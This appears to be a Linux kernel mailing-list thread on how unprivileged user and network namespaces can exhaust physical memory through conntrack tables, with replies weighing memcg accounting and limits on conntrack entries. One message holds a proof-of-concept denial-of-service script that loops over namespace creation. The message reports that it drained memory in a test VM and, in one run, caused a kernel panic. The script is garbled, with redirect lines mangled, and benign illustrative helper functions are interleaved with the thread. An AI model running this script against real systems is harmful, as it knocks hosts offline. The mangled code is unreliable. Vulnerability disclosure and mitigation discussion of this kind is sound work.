Re: userns, netns, and quick physical memory consumption by unprivileged user
On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote:
[...]
> And also tried with memcg:
> t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
> echo 48M >$t/memory.limit_in_bytes; su testuser [...]
> and it has not helped at all (rather opposite, it ended up with killed
> init and kernel panic; well, later is pure (un)luck; but point is, memcg
> apparently *CANNOT* curb net/ns allocations).

It seems you were using memcg v1 here. That version did not have kernel
memory accounting enabled by default. With v2 you get both user and kernel
(well, some subset of it) accounting enabled. Whether we also account
netns-related data structures sufficiently is an open question; I haven't
checked. But it would be worth trying, and fixing where it falls short.
-- 
Michal Hocko
SUSE Labs
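Since the v1/v2 distinction decides whether kernel memory is accounted at all, it helps to check which layout a test box actually has mounted. The following is a minimal sketch, not part of the original report: the function name `cgroup_memory_layout` is made up for illustration, and the check is a heuristic that assumes the usual mount point `/sys/fs/cgroup`.

```shell
#!/bin/sh
# Report which memory controller layout is mounted under a cgroup root.
# $1: cgroup mount point (assumed default: /sys/fs/cgroup).
# Hypothetical helper for illustration only.
cgroup_memory_layout() {
    root="${1:-/sys/fs/cgroup}"
    if [ -f "$root/cgroup.controllers" ]; then
        # The unified (v2) hierarchy exposes cgroup.controllers at its root.
        echo v2
    elif [ -d "$root/memory" ]; then
        # v1 mounts each controller in its own directory, e.g. .../memory.
        echo v1
    else
        echo unknown
    fi
}

cgroup_memory_layout "$@"
```

On a v2 hierarchy the limit is written to `memory.max` rather than to the v1 file `memory.limit_in_bytes` used in the quoted test.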
Re: userns, netns, and quick physical memory consumption by unprivileged user
On Fri, Mar 11, 2016 at 04:34:06PM +0100, Florian Westphal wrote:
> Yuriy M. Kaminskiy wrote:
> > BTW, all those hash/conntrack/etc default sizes was calculated from
> > physical memory size in assumption there will be only *one* instance of
> > those tables. Obviously, introduction of network namespaces (and
> > especially unprivileged user-ns) thrown this assumption in the window
> > (and here comes that "falling back to vmalloc" message again; in pre-netns
> > world, those tables were allocated *once* on early system startup, with
> > typically plenty of free and unfragmented memory).
>
> No idea how to fix this expect by removing conntrack support in net
> namespaces completely.
>
> I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
> CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
> packet from init_ns to container.
>
> Containers could then still test conntrack as seen from init namespace pov
> in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
>
> [ OUTPUT *might* be doable as well by allowing NEW creation in output
> but skipping nat and deferring the confirmation/commit of the new
> entry to the table until skb leaves initns ]
>
> We could key conntrack entries to initns conntrack table
> instead of adding one new table per netns, but seems like this only
> replaces one problem with a new one (filling/blocking initns table from
> another netns).

We can add a global per-netns limit on the number of conntrack entries
that can only be set with CAP_NET_ADMIN from the initns. That way we avoid
the filling/blocking from another netns; or we hide this knob from
unprivileged userns somehow.

As I remember it, at the previous netfilter workshop we agreed on going
towards having a single conntrack table for netns, so I suggest we follow
that direction.
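The per-netns limit proposed above is a design idea, not an existing knob, so it cannot be shown directly. What can be checked today is how full the conntrack table is from inside a given namespace, via the `nf_conntrack_count` and `nf_conntrack_max` sysctls. A minimal sketch follows; the function name `conntrack_usage` is hypothetical, and it assumes the sysctls are visible at `/proc/sys/net/netfilter`, which may not hold in every namespace.

```shell
#!/bin/sh
# Print "count/max" conntrack usage as seen from the current network namespace.
# $1: sysctl directory (assumed default: /proc/sys/net/netfilter).
# Hypothetical helper for illustration only.
conntrack_usage() {
    dir="${1:-/proc/sys/net/netfilter}"
    if [ -r "$dir/nf_conntrack_count" ] && [ -r "$dir/nf_conntrack_max" ]; then
        echo "$(cat "$dir/nf_conntrack_count")/$(cat "$dir/nf_conntrack_max")"
    else
        # The files are missing or unreadable, e.g. nf_conntrack is not loaded.
        echo unavailable
    fi
}

conntrack_usage "$@"
```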
Re: userns, netns, and quick physical memory consumption by unprivileged user
ping (+ more test results at bottom)

On Wed, 02 Mar 2016, I wrote:
> While looking at CVE-2016-2847, I remembered about infamous
> nf_conntrack: falling back to vmalloc
> message, that was often triggered by network namespace creation (message
> was removed recently, but it changed nothing with underlying problem).
>
> So, how about something like this:
>
> $ cat << EOF >> eatphysmem
> #!/bin/bash -xe
> fd=6
> d="`mktemp -d /tmp/eatmemX`"
> cd "$d"
> rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
> # rule="$rule;$rule"
> # ... just because we can; same with any number of ip li/ro/ru/etc
> while :; do
> let fd=fd+1
> [ ! -e /proc/$$/fd/$fd ] || continue
> mkfifo f1 f2
> unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r pid=$!
> read r eval "exec $fd echo bar >f2
> wait
> rm f2 f1
> free
> sleep 0.1s
> done
> sleep inf
> EOF
> $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
> ?
>
> You can easily eat 0.5M physical memory per netns (conntrack hash table
> (hashsize*sizeof(list_head))) and more, and pin them to single process
> with opened netns fds.
> What can stop it?
> ulimit? What is ulimit? Conntrack knows nothing about them.
> Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
> OOM killer? But this is not this process memory; if any, it will be
> killed last.
> (I wonder, if memcg can tackle it; probably yes; but how many people
> have it configured?).

I tested in a VM with kernel 4.4.2 (from a user account, with
ulimit -v 32768). As expected, it quickly ate all memory; the OOM killer
went berserk and killed even systemd-journald and systemd-udevd, but left
this process alive (and hogging all physical memory; also note that swap
was enabled, and mostly remained unused).

I also tried with memcg:
t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
echo 48M >$t/memory.limit_in_bytes; su testuser [...]
and it has not helped at all (rather the opposite: it ended up with init
killed and a kernel panic; well, the latter is pure (un)luck, but the point
is that memcg apparently *CANNOT* curb net/ns allocations).

BTW, all those hash/conntrack/etc default sizes were calculated from
physical memory size on the assumption that there will be only *one*
instance of those tables. Obviously, the introduction of network namespaces
(and especially unprivileged user-ns) threw this assumption out of the
window (and here comes that "falling back to vmalloc" message again; in the
pre-netns world, those tables were allocated *once* at early system startup,
with typically plenty of free and unfragmented memory).
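The "64k*512k = 32G" estimate quoted above can be checked with plain shell arithmetic. This is only a back-of-the-envelope sketch: the two inputs are the figures from the message (about 0.5M pinned per netns, 64k open files per process), and the helper name `pinned_bytes` is made up for illustration.

```shell
#!/bin/sh
# Upper bound on memory pinned through open netns fds, in bytes.
# $1: number of namespaces held open (bounded by `ulimit -n`)
# $2: bytes pinned per namespace
# Hypothetical helper for illustration only.
pinned_bytes() {
    echo $(( $1 * $2 ))
}

per_netns=$(( 512 * 1024 ))   # ~0.5M per netns, figure taken from the message
max_fds=$(( 64 * 1024 ))      # 64k open files, figure taken from the message
total=$(pinned_bytes "$max_fds" "$per_netns")

# Integer division down to GiB; prints "32 GiB".
echo "$(( total / 1024 / 1024 / 1024 )) GiB"
```

The bound scales linearly in both inputs, so halving either the fd limit or the per-netns table size halves the total.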
Re: userns, netns, and quick physical memory consumption by unprivileged user
Yuriy M. Kaminskiy wrote:
> BTW, all those hash/conntrack/etc default sizes was calculated from
> physical memory size in assumption there will be only *one* instance of
> those tables. Obviously, introduction of network namespaces (and
> especially unprivileged user-ns) thrown this assumption in the window
> (and here comes that "falling back to vmalloc" message again; in pre-netns
> world, those tables were allocated *once* on early system startup, with
> typically plenty of free and unfragmented memory).

No idea how to fix this except by removing conntrack support in net
namespaces completely.

I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
a packet from init_ns to a container.

Containers could then still test conntrack as seen from the init
namespace's point of view in PREROUTING/FORWARD/INPUT (but not OUTPUT,
obviously).

[ OUTPUT *might* be doable as well by allowing NEW creation in output
but skipping nat and deferring the confirmation/commit of the new
entry to the table until the skb leaves initns ]

We could key conntrack entries to the initns conntrack table
instead of adding one new table per netns, but it seems like this only
replaces one problem with a new one (filling/blocking the initns table
from another netns).

Maybe we could go with a compromise and skip/disallow conntrack in
unpriv userns only?